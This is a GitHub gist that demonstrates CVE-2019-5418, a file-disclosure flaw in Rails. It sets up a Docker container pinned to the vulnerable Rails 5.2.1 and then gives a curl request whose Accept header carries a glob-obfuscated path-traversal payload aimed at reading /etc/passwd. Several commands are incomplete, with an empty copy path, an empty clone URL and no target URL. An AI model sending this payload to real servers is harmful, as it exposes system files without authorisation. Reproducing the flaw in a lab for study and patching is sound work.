Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
CVE-2019-5418 Demo

CVE-2019-5418 Demo

Build Docker container: Dockerfile

FROM ruby:2.5
RUN apt-get update -qq && apt-get install -y nodejs postgresql-client
RUN mkdir /myapp
WORKDIR /myapp
COPY Gemfile /myapp/Gemfile
COPY Gemfile.lock /myapp/Gemfile.lock
RUN bundle install
COPY . /myapp

# Add a script to be executed every time the container starts.
COPY /usr/bin/
RUN chmod +x /usr/bin/

# Start the main process.
CMD ["rails", "server", "-b", ""]

Setup docker container

docker build -t rails:CVE-2019-5418 .
docker run -ti --rm -v `pwd`:/myapp -p 3000:3000 rails:CVE-2019-5418 /bin/bash
git clone
cd CVE-2019-5418/demo/
sed -i -e "s/^gem 'rails'.*/gem 'rails', '5.2.1'/" -e "s/^ruby '2.5.1'$/ruby '2.5.5'/" Gemfile
bundle install
bundle update
bundle exec rails s -p 3000 -b ''

To demonstrate vulnerability

curl -i -s -k  -X $'GET' \
    -H $'Host:' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: .././.././.././.././.././.././.././.././.././.././e*c/./p*d{{' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' -H $'Connection: close' \



This comment has been minimized.

Copy link

@ghost ghost commented Apr 5, 2019

How is this bypass technology works?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment